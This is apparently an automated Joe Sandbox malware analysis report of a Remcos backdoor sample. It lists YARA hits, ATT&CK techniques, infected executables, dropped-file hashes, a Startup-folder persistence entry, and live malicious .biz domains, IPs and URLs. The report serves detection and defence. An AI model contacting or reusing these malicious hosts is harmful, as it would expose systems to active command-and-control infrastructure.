              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_004652BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00476619
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,1_2_0046CEF3
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,3_2_004652BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00476619
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,3_2_0046CEF3
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information111
              Scripting
              2
              Valid Accounts
              3
              Native API
              111
              Scripting
              1
              Exploitation for Privilege Escalation
              1
              Disable or Modify Tools
              21
              Input Capture
              12
              System Time Discovery
              1
              Taint Shared Content
              11
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              LSASS Driver
              1
              Abuse Elevation Control Mechanism
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol21
              Input Capture
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              2
              LSASS Driver
              1
              Abuse Elevation Control Mechanism
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Valid Accounts
              1
              DLL Side-Loading
              3
              Obfuscated Files or Information
              NTDS116
              System Information Discovery
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd2
              Registry Run Keys / Startup Folder
              2
              Valid Accounts
              1
              Software Packing
              LSA Secrets221
              Security Software Discovery
              SSHKeylogging3
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
              Access Token Manipulation
              1
              Timestomp
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture13
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items312
              Process Injection
              1
              DLL Side-Loading
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
              Registry Run Keys / Startup Folder
              322
              Masquerading
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Valid Accounts
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Virtualization/Sandbox Evasion
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Access Token Manipulation
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
              Process Injection
              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Behavior Graph (ID: 1529033, Sample: tyRPPK48Mk.exe, Startdate: 08/10/2024, Architecture: WINDOWS, Score: 100)

              SourceDetectionScannerLabelLink
              tyRPPK48Mk.exe74%ReversingLabsWin32.Backdoor.Remcos
              tyRPPK48Mk.exe100%Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                            35.164.78.200
                                                                                                                                                                                            truetrue
                                                                                                                                                                                              wllvnzb.biz
                                                                                                                                                                                              18.141.10.107
                                                                                                                                                                                              truetrue
                                                                                                                                                                                                kvbjaur.biz
                                                                                                                                                                                                54.244.188.177
                                                                                                                                                                                                truetrue
                                                                                                                                                                                                  napws.biz
                                                                                                                                                                                                  35.164.78.200
                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                    cvgrf.biz
                                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                                    truetrue
                                                                                                                                                                                                      lpuegx.biz
                                                                                                                                                                                                      82.112.184.197
                                                                                                                                                                                                      truetrue
                                                                                                                                                                                                        vcddkls.biz
                                                                                                                                                                                                        18.141.10.107
                                                                                                                                                                                                        truetrue
                                                                                                                                                                                                          wluwplyh.biz
                                                                                                                                                                                                          18.141.10.107
                                                                                                                                                                                                          truetrue
                                                                                                                                                                                                            vyome.biz
                                                                                                                                                                                                            44.213.104.86
                                                                                                                                                                                                            truetrue
                                                                                                                                                                                                              dlynankz.biz
                                                                                                                                                                                                              85.214.228.140
                                                                                                                                                                                                              truetrue
                                                                                                                                                                                                                reczwga.biz
                                                                                                                                                                                                                44.221.84.105
                                                                                                                                                                                                                truetrue
                                                                                                                                                                                                                  xccjj.biz
                                                                                                                                                                                                                  44.213.104.86
                                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                                    jifai.biz
                                                                                                                                                                                                                    44.221.84.105
                                                                                                                                                                                                                    truetrue
Name | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                                                                                                                                                                                            http://wluwplyh.biz/fhnitrue
                                                                                                                                                                                                                                                                                                                                                                              http://pwlqfu.biz/kyoprhcrfsmtrue
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              19574CSCUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              44.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              ereplfx.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              72.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                              wxgzshna.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              44.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              bumxkqgxu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              85.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                                                                                              6724STRATOSTRATOAGDEtrue
                                                                                                                                                                                                                                                                                                                                                                                                                              54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              nlscndwp.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              xnxvnn.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                              47.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              qncdaagct.bizCanada
                                                                                                                                                                                                                                                                                                                                                                                                                              34533ESAMARA-ASRUtrue
                                                                                                                                                                                                                                                                                                                                                                                                                              82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                                              43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUtrue
                                                                                                                                                                                                                                                                                                                                                                                                                              18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                              16509AMAZON-02UStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529033
Start date and time: 2024-10-08 15:26:46 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 38
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: tyRPPK48Mk.exe (renamed because original name is a hash value)
Original Sample Name: 35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@36/157@327/21
EGA Information:
• Successful, ratio: 88.9%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 71
• Number of non-executed functions: 298
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, SIHClient.exe, conhost.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target svchost.exe, PID 4476 because there are no executed function
                                                                                                                                                                                                                                                                                                                                                                                                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                              • VT rate limit hit for: tyRPPK48Mk.exe
Time      Type             Description
09:27:55  API Interceptor  2352406x Sleep call for process: svchost.exe modified
09:27:58  API Interceptor  167x Sleep call for process: alg.exe modified
09:28:37  API Interceptor  200x Sleep call for process: msdtc.exe modified
09:31:16  API Interceptor  1x Sleep call for process: elevation_service.exe modified
09:31:53  API Interceptor  1x Sleep call for process: PerceptionSimulationService.exe modified
14:27:51  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                                                                                                                                                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324361132136671
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:nC4VQjGARQNhifXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:nOCAR0ifsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:564A5FEF46447DB5471426BBE0BBAF2B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:612AEA6569ED54639C78DBFAEBDB508E8FD5A274
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F3AF8E14CC00898C232DED5CDA71342C006F8897BDA68B6E1398113204A35B6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5A7203A606F5A174F2817E1135E587D68FCECD7BBB7B0B56444EC6AA304BBA26AF0D7E29CBC14B715EF03E18D7F607254C6657894E213479ACD3361089BB1522
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.282670855701376
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:9NUpaKghsXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9CMKgusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6BFA68DB2428D8234CF8B62F71AA5230
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A5A5D4125FFA7A3DE00F3BAEDC5AE1A7065A73E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:312853A2671E1B4101DD8233BBE3FDF65E2200065A7FA8FFA0F2A6B981047556
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:08A665A9FDFA40A4C8A4ECB7888A74E60F3E88E0C9151D1DD5F28008C629E1B1B51A68B1EE66357C76BECBD6A100DACE56A1B63FF3A1E4BE76FD03594AF06697
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.274100738172734
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:qMEhwdbTjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gKdHjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F2736362C7764C4F6470A5C27D290EE8
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5E20167B9523007931EE1F82ECB618D51F2CF08C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E44B3705E8E369F1E9AE1F8175A4598C044D58B1B926D173FBA7CB252E9FCC1C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:963B4D657932571AF24F27B7E0864049B0E1038543D803C1FD41F5CC83B35869B47A54409A5362CA68FB194AA7E9A0367891CCD7EC9BFA88FF00D6EC3DD7E7F9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.6470130260013
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:0K0eqkSR7Xgo4TiRPnLWvJfDmg27RnWGj:0K0pR7Xn4TiRCvJfD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0096FD4730FEB421F331FD5951003DDF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6110B1A5154D80731F3EEEF92AA98587AB846E4A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2A2C9C11F758F07DBCA79ACE60C34B87DDBB3B669861D0373B7BD65321024B5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DB8D687FFDF70A5DF3DB5883CB7F93661AF0696DD6A9673A5D3E8BC62EDBC8915E29F466155D7A895EA276ED2478C78B08BD80336CC9B02107E6960353277238
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.565043446997657
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:4fYP1JsEDkSR7Xgo4TiRPnLWvJfDmg27RnWGj:oYPBR7Xn4TiRCvJfD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AA662A79593DE523DF94690AB29FDF4E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B7F9913BDEC6D16CE1A35BA6FAF56CC20066B2A5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D9C7ED411C99A864BA827DFC86DC25E36740888FDB4956D49B20F8EB59DC8E88
